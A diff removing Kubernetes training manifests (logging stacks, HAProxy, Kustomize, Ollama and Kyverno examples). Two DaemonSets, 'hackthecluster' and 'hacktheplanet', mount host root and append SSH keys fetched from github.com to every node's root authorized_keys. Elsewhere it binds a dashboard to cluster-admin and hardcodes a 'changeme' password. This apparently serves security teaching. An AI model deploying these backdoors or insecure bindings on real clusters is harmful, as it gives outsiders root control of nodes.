cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
- name: varlog
mountPath: /var/log
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: varlog
hostPath:
path: /var/log
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: eck-demo
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
---

View File

@@ -1,17 +0,0 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
name: demo
spec:
version: 7.5.1
count: 1
elasticsearchRef:
name: demo
namespace: eck-demo
http:
service:
spec:
type: NodePort
tls:
selfSignedCertificate:
disabled: true

File diff suppressed because it is too large Load Diff

View File

@@ -1,176 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: fluentd
rules:
- apiGroups:
- ""
resources:
- pods
- namespaces
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: fluentd
roleRef:
kind: ClusterRole
name: fluentd
apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: fluentd
namespace: default
labels:
app: fluentd
spec:
selector:
matchLabels:
app: fluentd
template:
metadata:
labels:
app: fluentd
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
- name: FLUENT_ELASTICSEARCH_PORT
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
volumeMounts:
- name: varlog
mountPath: /var/log
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
terminationGracePeriodSeconds: 30
volumes:
- name: varlog
hostPath:
path: /var/log
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: elasticsearch
name: elasticsearch
namespace: default
spec:
selector:
matchLabels:
app: elasticsearch
template:
metadata:
labels:
app: elasticsearch
spec:
containers:
- image: elasticsearch:5
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
---
apiVersion: v1
kind: Service
metadata:
labels:
app: elasticsearch
name: elasticsearch
namespace: default
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: kibana
name: kibana
namespace: default
spec:
selector:
matchLabels:
app: kibana
template:
metadata:
labels:
app: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
name: kibana
resources: {}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: kibana
name: kibana
namespace: default
spec:
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,97 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
selector:
matchLabels:
name: elasticsearch-operator
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,30 +0,0 @@
kind: Event
apiVersion: v1
metadata:
generateName: hello-
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
kind: Node
apiVersion: v1
name: kind-control-plane
# Note: the uid should be the Node name (not the uid of the Node).
# This might be specific to global objects.
uid: kind-control-plane
type: Warning
reason: NodeOverheat
message: "Node temperature exceeds critical threshold"
action: Hello
source:
component: thermal-probe
#host: node1
#reportingComponent: ""
#reportingInstance: ""

View File

@@ -1,36 +0,0 @@
kind: Event
apiVersion: v1
metadata:
# One convention is to use <objectname>.<timestamp>,
# where the timestamp is taken with a nanosecond
# precision and expressed in hexadecimal.
# Example: web-5dcb957ccc-fjvzc.164689730a36ec3d
name: hello.1234567890
# The label doesn't serve any purpose, except making
# it easier to identify or delete that specific event.
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
### These 5 lines should be updated to refer to an object.
### Make sure to put the correct "uid", because it is what
### "kubectl describe" is using to gather relevant events.
#apiVersion: v1
#kind: Pod
#name: magic-bean
#namespace: blue
#uid: 7f28fda8-6ef4-4580-8d87-b55721fcfc30
type: Normal
reason: BackupSuccessful
message: "Object successfully dumped to gitops repository"
source:
component: gitops-sync
#reportingComponent: ""
#reportingInstance: ""

View File

@@ -1,170 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,14 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hackthecluster
spec:
selector:
matchLabels:
app: hackthecluster
template:
metadata:
labels:
app: hackthecluster
spec:
volumes:
- name: slash
hostPath:
path: /
tolerations:
- effect: NoSchedule
operator: Exists
containers:
- name: alpine
image: alpine
volumeMounts:
- name: slash
mountPath: /hostfs
command:
- sleep
- infinity
securityContext:
#privileged: true
capabilities:
add:
- SYS_CHROOT

View File

@@ -1,33 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,16 +0,0 @@
global
daemon
defaults
mode tcp
timeout connect 5s
timeout client 50s
timeout server 50s
listen very-basic-load-balancer
bind *:80
server blue color.blue.svc:80
server green color.green.svc:80
### Note: the services above must exist,
### otherwise HAproxy won't start.

View File

@@ -1,16 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: haproxy
spec:
volumes:
- name: config
configMap:
name: haproxy
containers:
- name: haproxy
image: haproxy:1
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/

View File

@@ -1,29 +0,0 @@
kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2
metadata:
name: rng
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: rng
minReplicas: 1
maxReplicas: 20
behavior:
scaleUp:
stabilizationWindowSeconds: 60
scaleDown:
stabilizationWindowSeconds: 180
metrics:
- type: Object
object:
describedObject:
apiVersion: v1
kind: Service
name: httplat
metric:
name: httplat_latency_seconds
target:
type: Value
value: 0.1

View File

@@ -1,20 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: whatever
port:
number: 1234

View File

@@ -1,17 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234

View File

@@ -1 +0,0 @@
ingress-v1beta1.yaml

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
spec:
initContainers:
- name: git-clone
image: alpine
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
git clone git://github.com/jpetazzo/container.training /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
containers:
- name: build-image
image: gcr.io/kaniko-project/executor:latest
args:
- "--context=/workspace/dockercoins/rng"
- "--insecure"
- "--destination=registry:5000/rng-kaniko:latest"
volumeMounts:
- name: workspace
mountPath: /workspace
volumes:
- name: workspace

View File

@@ -1,12 +0,0 @@
# This removes the haproxy Deployment.
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
patches:
- patch: |-
$patch: delete
kind: Deployment
apiVersion: apps/v1
metadata:
name: haproxy

View File

@@ -1,14 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
# Within a Kustomization, it is not possible to specify in which
# order transformations (patches, replacements, etc) should be
# executed. If we want to execute transformations in a specific
# order, one possibility is to put them in individual components,
# and then invoke these components in the order we want.
# It works, but it creates an extra level of indirection, which
# reduces readability and complicates maintenance.
components:
- setup
- cleanup

View File

@@ -1,20 +0,0 @@
global
#log stdout format raw local0
#daemon
maxconn 32
defaults
#log global
timeout client 1h
timeout connect 1h
timeout server 1h
mode http
option abortonclose
frontend metrics
bind :9000
http-request use-service prometheus-exporter
frontend ollama_frontend
bind :8000
default_backend ollama_backend
maxconn 16
backend ollama_backend
server ollama_server localhost:11434 check

View File

@@ -1,39 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: haproxy
name: haproxy
spec:
selector:
matchLabels:
app: haproxy
template:
metadata:
labels:
app: haproxy
spec:
volumes:
- name: haproxy
configMap:
name: haproxy
containers:
- image: haproxy:3.0
name: haproxy
volumeMounts:
- name: haproxy
mountPath: /usr/local/etc/haproxy
readinessProbe:
httpGet:
port: 9000
ports:
- name: haproxy
containerPort: 8000
- name: metrics
containerPort: 9000
resources:
requests:
cpu: 0.05
limits:
cpu: 1

View File

@@ -1,75 +0,0 @@
# This adds a sidecar to the ollama Deployment, by taking
# the pod template and volumes from the haproxy Deployment.
# The idea is to allow to run ollama+haproxy in two modes:
# - separately (each with their own Deployment),
# - together in the same Pod, sidecar-style.
# The YAML files define how to run them separetely, and this
# "replacements" directive fetches a specific volume and
# a specific container from the haproxy Deployment, to add
# them to the ollama Deployment.
#
# This would be simpler if kustomize allowed to append or
# merge lists in "replacements"; but it doesn't seem to be
# possible at the moment.
#
# It would be even better if kustomize allowed to perform
# a strategic merge using a fieldPath as the source, because
# we could merge both the containers and the volumes in a
# single operation.
#
# Note that technically, it might be possible to layer
# multiple kustomizations so that one generates the patch
# to be used in another; but it wouldn't be very readable
# or maintainable so we decided to not do that right now.
#
# However, the current approach (fetching fields one by one)
# has an advantage: it could let us transform the haproxy
# container into a real sidecar (i.e. an initContainer with
# a restartPolicy=Always).
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
resources:
- haproxy.yaml
configMapGenerator:
- name: haproxy
files:
- haproxy.cfg
replacements:
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.volumes.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.volumes.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.containers.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy].ports.[name=haproxy].containerPort
targets:
- select:
kind: Service
name: ollama
fieldPaths:
- spec.ports.[name=11434].targetPort

View File

@@ -1,34 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 2
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
ports:
- containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- port: 80
selector:
app: blue

View File

@@ -1,94 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
# Each of these YAML files contains a Deployment and a Service.
# The blue.yaml file is here just to demonstrate that the rest
# of this Kustomization can be precisely scoped to the ollama
# Deployment (and Service): the blue Deployment and Service
# shouldn't be affected by our kustomize transformers.
resources:
- ollama.yaml
- blue.yaml
buildMetadata:
# Add a label app.kubernetes.io/managed-by=kustomize-vX.Y.Z
- managedByLabel
# Add an annotation config.kubernetes.io/origin, indicating:
# - which file defined that resource;
# - if it comes from a git repository, which one, and which
# ref (tag, branch...) it was.
- originAnnotations
# Add an annotation alpha.config.kubernetes.io/transformations
# indicating which patches and other transformers have changed
# each resource.
- transformerAnnotations
# Let's generate a ConfigMap with literal values.
# Note that this will actually add a suffix to the name of the
# ConfigMaps (e.g.: ollama-8bk8bd8m76) and it will update all
# references to the ConfigMap (e.g. in Deployment manifests)
# accordingly. The suffix is a hash of the ConfigMap contents,
# so that basically, if the ConfigMap is edited, any workload
# using that ConfigMap will automatically do a rolling update.
configMapGenerator:
- name: ollama
literals:
- "model=gemma3:270m"
- "prompt=If you visit Paris, I suggest that you"
- "queue=4"
name: ollama
patches:
# The Deployment manifest in ollama.yaml doesn't specify
# resource requests and limits, so that it can run on any
# cluster (including resource-constrained local clusters
# like KiND or minikube). The example belows add CPU
# requests and limits using a strategic merge patch.
# The patch is inlined here, but it could also be put
# in a file and referenced with "path: xxxxxx.yaml".
- patch: |
apiVersion: apps/v1
kind: Deployment
metadata:
name: ollama
spec:
template:
spec:
containers:
- name: ollama
resources:
requests:
cpu: 1
limits:
cpu: 2
# This will have the same effect, with one little detail:
# JSON patches cannot specify containers by name, so this
# assumes that the ollama container is the first one in
# the pod template (whereas the strategic merge patch can
# use "merge keys" and identify containers by their name).
#- target:
# kind: Deployment
# name: ollama
# patch: |
# - op: add
# path: /spec/template/spec/containers/0/resources
# value:
# requests:
# cpu: 1
# limits:
# cpu: 2
# A "component" is a bit like a "base", in the sense that
# it lets us define some reusable resources and behaviors.
# There is a key different, though:
# - a "base" will be evaluated in isolation: it will
# generate+transform some resources, then these resources
# will be included in the main Kustomization;
# - a "component" has access to all the resources that
# have been generated by the main Kustomization, which
# means that it can transform them (with patches etc).
components:
- add-haproxy-sidecar

View File

@@ -1,73 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: ollama
name: ollama
spec:
selector:
matchLabels:
app: ollama
template:
metadata:
labels:
app: ollama
spec:
volumes:
- name: ollama
hostPath:
path: /opt/ollama
type: DirectoryOrCreate
containers:
- image: ollama/ollama
name: ollama
env:
- name: OLLAMA_MAX_QUEUE
valueFrom:
configMapKeyRef:
name: ollama
key: queue
- name: MODEL
valueFrom:
configMapKeyRef:
name: ollama
key: model
volumeMounts:
- name: ollama
mountPath: /root/.ollama
lifecycle:
postStart:
exec:
command:
- /bin/sh
- -c
- ollama pull $MODEL
livenessProbe:
httpGet:
port: 11434
readinessProbe:
exec:
command:
- /bin/sh
- -c
- ollama show $MODEL
ports:
- name: ollama
containerPort: 11434
---
apiVersion: v1
kind: Service
metadata:
labels:
app: ollama
name: ollama
spec:
ports:
- name: "11434"
port: 11434
protocol: TCP
targetPort: 11434
selector:
app: ollama
type: ClusterIP

View File

@@ -1,5 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices
- redis

View File

@@ -1,13 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices.yaml
transformers:
- |
apiVersion: builtin
kind: PrefixSuffixTransformer
metadata:
name: use-ghcr-io
prefix: ghcr.io/
fieldSpecs:
- path: spec/template/spec/containers/image

View File

@@ -1,125 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,4 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- redis.yaml

View File

@@ -1,35 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,30 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- dockercoins.yaml
replacements:
- sourceValue: ghcr.io/dockercoins
targets:
- select:
kind: Deployment
labelSelector: "app in (hasher,rng,webui,worker)"
# It will soon be possible to use regexes in replacement selectors,
# meaning that the "labelSelector:" above can be replaced with the
# following "name:" selector which is a tiny bit simpler:
#name: hasher|rng|webui|worker
# Regex support in replacement selectors was added by this PR:
# https://github.com/kubernetes-sigs/kustomize/pull/5863
# This PR was merged in August 2025, but as of October 2025, the
# latest release of Kustomize is 5.7.1, which was released in July.
# Hopefully the feature will be available in the next release :)
# Another possibility would be to select all Deployments, and then
# reject the one(s) for which we don't want to update the registry;
# for instance:
#reject:
# kind: Deployment
# name: redis
fieldPaths:
- spec.template.spec.containers.*.image
options:
delimiter: "/"
index: 0

View File

@@ -1,28 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
number: 80
path: /
pathType: Prefix

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: http
operator: In
value: "{{request.object.spec.ports[*].name}}"
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,34 +0,0 @@
# Note: this policy uses the operator "AnyIn", which was introduced in Kyverno 1.6.
# (This policy won't work with Kyverno 1.5!)
apiVersion: kyverno.io/v1
